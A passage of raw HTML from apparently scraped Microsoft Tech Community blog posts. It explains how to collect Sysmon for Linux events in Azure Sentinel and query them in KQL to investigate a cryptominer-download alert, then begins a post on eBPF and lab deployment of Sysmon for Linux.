data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">If&nbsp;there are potential&nbsp;events observed from sources that are malicious, Azure Sentinel will alert you on the map like below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_2-1634234806560.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317454i14F5FD03C6927660/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_2-1634234806560.png" alt="jessenkurien_2-1634234806560.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Sysmon&nbsp;is supported by the Azure Sentinel and the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel Information Model</SPAN></A>&nbsp;<SPAN data-contrast="auto">(ASim), ensuring Sysmon&nbsp;data&nbsp;is analyzed by built-in analytics, and easy to query.&nbsp;It is important to enable Sysmon Event collection for parsing and it can be configured by using below steps:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="7" aria-setsize="-1" data-aria-posinset="1" data-aria-level="2"><SPAN data-contrast="auto">Configure&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog collection</SPAN></A><SPAN data-contrast="auto">&nbsp;using the Log Analytics agent.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="7" aria-setsize="-1" data-aria-posinset="2" data-aria-level="2"><SPAN data-contrast="auto">Deploy the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysmon ASim parser pack</SPAN></A><SPAN data-contrast="auto">. Or better yet, all&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASim</SPAN></A><SPAN data-contrast="auto">&nbsp;parsers&nbsp;in a single package.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P aria-level="1"><STRONG>Enriching the Investigation of an&nbsp;Alert:&nbsp;</STRONG></P> <P><SPAN data-contrast="auto">For example, let’s&nbsp;look&nbsp;at&nbsp;one of the&nbsp;alerts&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘Possible Cryptocoinminer download detected’</SPAN></A><SPAN data-contrast="auto">&nbsp;that we had shown in the Incidents tab.&nbsp;This&nbsp;alert will&nbsp;trigger&nbsp;any cryptocoinmining download activity&nbsp;observed in the network.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_3-1634234806553.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317455i862F0DD4BBAB148F/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_3-1634234806553.png" alt="jessenkurien_3-1634234806553.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">To investigate an alert like this&nbsp;using Azure Sentinel we need to use some of the events&nbsp;generated&nbsp;by Sysmon.&nbsp;Below are&nbsp;some of&nbsp;the events&nbsp;made&nbsp;available&nbsp;with&nbsp;Sysmon for&nbsp;Linux&nbsp;release.&nbsp;It's&nbsp;important to&nbsp;note&nbsp;that you need to set the different events that you want in the Sysmon config.&nbsp;More details on the steps can be found here&nbsp;under&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OSSEM (Open Source Security Events Metadata)&nbsp;project</SPAN></A><SPAN data-contrast="auto">.&nbsp;For this blog, we have configured Sysmon to collect Process Create and Network Connection events&nbsp;that we have shown as part of&nbsp;a quick&nbsp;alert analysis.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><SPAN data-contrast="auto">1 – Process Create&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process creation event provides extended information about a newly created process. </SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">3 – Network Connect</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The network connection event logs TCP/UDP connections on the machine. The event also contains the source and destination host names&nbsp;IP (Internet Protocol)&nbsp;addresses, port numbers and&nbsp;IPv6 (Internet Protocol Version 6)&nbsp;status.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">5 – Process Terminate</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process&nbsp;terminate&nbsp;event reports when a process terminates. It provides the UtcTime, ProcessGuid and ProcessId of the process.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">9 – Raw Access Read</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The RawAccessRead event detects when a process conducts reading operations from the drive using the \\.\ denotation. This technique is often used by malware for data exfiltration of files that are locked for reading, as well as to avoid file access auditing tools. The event indicates the source process and target device.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">10 – Access Process</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process accessed event reports when a process opens another process, an operation that’s often followed by information queries or reading and writing the address space of the target process.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">11 – File Create</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">File&nbsp;create operations are logged when a file is created or overwritten. This event is useful for monitoring&nbsp;AutoStart&nbsp;locations, like the Startup folder, as well as temporary and download directories, which are common places malware drops during initial infection.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><SPAN data-contrast="auto">23 – File Delete</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">A file was deleted. Helpful event when attackers will try to cover their tracks and even to find anomalies from high privilege monitoring machines.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Once the events are&nbsp;setup&nbsp;and being collected in Azure Sentinel,&nbsp;we can run a query like the one below to view all the&nbsp;process create logs that triggered around the time of the alert.&nbsp;We can see the download related to&nbsp;crypto mining&nbsp;activity along with other enumeration commands that can be used to learn more&nbsp;about&nbsp;what attackers did and&nbsp;help&nbsp;reveal more details of the attack.&nbsp;You&nbsp;can always set the time span in the ‘Time Range’ column in&nbsp;Azure&nbsp;Sentinel.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="python">vimProcessCreateLinuxSysmon | where Computer =~ "UBUNTU18ASCSYSMON" | summarize count () by Computer, CommandLine, Process</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_4-1634234806561.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317456i6D8608E60B36200C/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_4-1634234806561.png" alt="jessenkurien_4-1634234806561.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">We&nbsp;can also view the&nbsp;network connection logs around the timeline of the&nbsp;attack by using a query below&nbsp;to&nbsp;find&nbsp;the&nbsp;source of the attack and&nbsp;potential enumeration&nbsp;activity&nbsp;within the network.&nbsp;A similar approach can be taken to analyze attacker activity with the other logs sources made available&nbsp;using Sysmon for Linux.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python">vimNetworkSessionLinuxSysmon | where Computer =~ "UBUNTU18ASCSYSMON"| summarize count () by Computer, Process, SrcIpAddr, DstIpAddr, Protocol</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="jessenkurien_1-1634239226618.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317486iF09CCD1B12105B6A/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_1-1634239226618.png" alt="jessenkurien_1-1634239226618.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">If you would like to look at logs that triggered within a certain time span after or before the&nbsp;alert,&nbsp;a query like the one below might help in the analysis.&nbsp;In&nbsp;the&nbsp;below query we have joined the ‘Possible Cryptocoinminer download detected’ alert with Process Create Linux Sysmon logs to&nbsp;reveal activities&nbsp;that occurred within 1 minute of the alert. A query like this can be applied with other alerts and log sources as well&nbsp;to investigate&nbsp;incidents&nbsp;previously shown under Incidents tab.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python"> SecurityAlert | where AlertName == "Possible Cryptocoinminer download detected" | summarize count () by WorkspaceSubscriptionId,CompromisedEntity= toupper(CompromisedEntity),TimeGenerated,AlertName | join kind=inner ( vimProcessCreateLinuxSysmon | project Computer = toupper(Computer), Timespan=TimeGenerated,CommandLine,Process ) on $left.CompromisedEntity==$right.Computer | extend TimeWindow = TimeGenerated + 01m | where Timespan between (TimeGenerated .. TimeWindow) | project TimeWindow,CompromisedEntity,AlertName,CommandLine,Process </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">&nbsp;&nbsp;</SPAN><SPAN style="font-family: inherit;" data-contrast="auto">&nbsp;&nbsp;</SPAN><SPAN style="font-family: inherit;" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_6-1634234806562.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317458iD5CAA84499C3903E/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_6-1634234806562.png" alt="jessenkurien_6-1634234806562.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">In our next blog post we will be covering how to use Sysmon for Linux to look for a specific MITRE ATT&amp;CK technique and what that looks like in&nbsp;Azure&nbsp;Sentinel. Please also&nbsp;refer to&nbsp;our blog post covering&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_self">Sentinel&nbsp;2&nbsp;Go and how to set up Sysmon for Linux&nbsp;</A>with it.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">To&nbsp;conclude,&nbsp;the release of this tool&nbsp;is a significant step not only in&nbsp;the&nbsp;Linux&nbsp;open-source&nbsp;community&nbsp;space&nbsp;but also&nbsp;in&nbsp;the advancements to&nbsp;combat the rising sophistication of threats related to Linux&nbsp;attacks.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As you start using and testing Sysmon for Linux tool, we encourage you to provide feedback along with details in the <A href="#" target="_self">Sysinternals GitHub</A> page.</SPAN><SPAN data-contrast="auto">&nbsp;Your feedback is critical&nbsp;in&nbsp;Microsoft's mission of&nbsp;building&nbsp;better protection&nbsp;and defense&nbsp;against&nbsp;cyber&nbsp;criminals.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">References&nbsp;&amp; Relevant Reading:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="8" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysinternals Utilities - Windows Sysinternals&nbsp;</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="8" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What is Azure Sentinel? | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel:(github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Reference table for all security alerts in Azure Security Center</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:2,&quot;335559685&quot;:240,&quot;335559738&quot;:270,&quot;335559739&quot;:135,&quot;335559740&quot;:330}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp;</SPAN> <SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> Thu, 14 Oct 2021 20:53:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305 jessenkurien 2021-10-14T20:53:18Z Automating the deployment of Sysmon for Linux 🐧 and Azure Sentinel in a lab environment 🧪 https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054 <P><SPAN data-contrast="auto"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Blog-page.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317433i969852CF86E8D694/image-size/large?v=v2&amp;px=999" role="button" title="Blog-page.png" alt="Blog-page.png" /></span></SPAN></P> <P><EM><SPAN>Thanks to Kevin Sheldrake, Russell McDonald, Jessen Kurien and Ofer Shezaf for making this blog possible.</SPAN></EM></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Today, we celebrate&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/windows-events/sysinternals-25-a-special-anniversary-event/ev-p/2787286" target="_blank" rel="noopener"><SPAN data-contrast="none">25 years of Sysinternals</SPAN></A><SPAN data-contrast="auto">,&nbsp;a set of utilities to analyze, troubleshoot and optimize Windows systems and applications.&nbsp;Also,&nbsp;as part of this special anniversary,&nbsp;we are&nbsp;releasing&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Sysmon for Linux</SPAN></STRONG><SPAN data-contrast="auto">,&nbsp;an open-source&nbsp;system monitor tool&nbsp;developed&nbsp;to collect security events&nbsp;from Linux environments&nbsp;using&nbsp;eBPF (</SPAN><SPAN data-contrast="none">Extended Berkeley Packet Filter)&nbsp;and</SPAN><SPAN data-contrast="auto">&nbsp;sending&nbsp;them to Syslog&nbsp;for easy consumption.&nbsp;Sysmon for Linux is built on&nbsp;a&nbsp;library also released today named <A href="#" target="_self">sysinternalsEBPF</A> which is built on&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">libbpf</SPAN></A><SPAN data-contrast="auto">&nbsp;including a library of eBPF inline functions used as helpers.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In this post, I will show you how to automatically deploy a research lab environment with&nbsp;an&nbsp;Azure&nbsp;Sentinel&nbsp;instance and&nbsp;a&nbsp;few Linux virtual machines&nbsp;with Sysmon for Linux&nbsp;already&nbsp;installed and configured to&nbsp;take it for&nbsp;a&nbsp;drive and explore&nbsp;its&nbsp;coverage.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As always, before getting into the technical parts of the main topics,&nbsp;it&nbsp;is&nbsp;important&nbsp;to understand some of the fundamental concepts behind Sysmon for Linux.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="1">&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What is eBPF?</SPAN></FONT></H2> <P><SPAN data-contrast="none">According to the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">eBPF Foundation</SPAN></A><SPAN data-contrast="none">,&nbsp;eBPF is a technology&nbsp;that&nbsp;allows programs to&nbsp;run&nbsp;in a sandbox&nbsp;in an operating system kernel.&nbsp;In other words,&nbsp;eBPF enables programmers to write code which gets executed in kernel space in a more secure and restricted&nbsp;way&nbsp;in order to add&nbsp;additional capabilities to the operating system at runtime.&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">Some of the use cases for eBPF are:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="none">Security</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Combining visibility and&nbsp;better level of control&nbsp;to secure systems.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="none">Tracing&nbsp;and profiling</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Powerful and unique insights to troubleshoot system performance.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><STRONG><SPAN data-contrast="none">Networking</SPAN></STRONG><SPAN data-contrast="none">: A natural fit for all packet processing requirements of networking solutions.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><STRONG><SPAN data-contrast="none">Observability and monitoring</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Collection and in-kernel aggregation of custom metrics.</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Why eBPF for Sysmon for Linux?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">From an event-tracing perspective,&nbsp;eBPF allows us to&nbsp;write event-driven programs and&nbsp;have pre-defined&nbsp;hooks into&nbsp;operations such as system calls, network&nbsp;connections,&nbsp;file write/read, etc. We can then&nbsp;collect those events and&nbsp;use them to understand adversary behavior&nbsp;during research or an investigation.&nbsp;As mentioned before, Sysmon for Linux uses&nbsp;its own library “sysinternalsEBPF” to handle the security events monitoring&nbsp;process.</SPAN></P> <P><SPAN>&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1634229152075.png" style="width: 911px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317395i91F2592563825D25/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1634229152075.png" alt="Cyb3rWard0g_0-1634229152075.png" /></span></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">You can find more information about&nbsp;the implementation of the new sysinternals EBPF library in the following resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">EBPF Summit: Auto-discovery of Kernel Struct Offsets without BTF – Kevin Sheldrake, Microsoft</SPAN><SPAN>&nbsp;</SPAN></A></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Installing Sysmon for Linux</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">All the information presented here about the installation is available in its&nbsp;own GitHub repository:</SPAN></P> <UL> <LI><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">SysinternalsEBPF/INSTALL.md at main · Sysinternals/SysinternalsEBPF (github.com)</A></SPAN></LI> <LI><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">SysmonForLinux/INSTALL.md at main · Sysinternals/SysmonForLinux (github.com)</A></SPAN></LI> </UL> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Register Microsoft Key and Feed</SPAN><SPAN 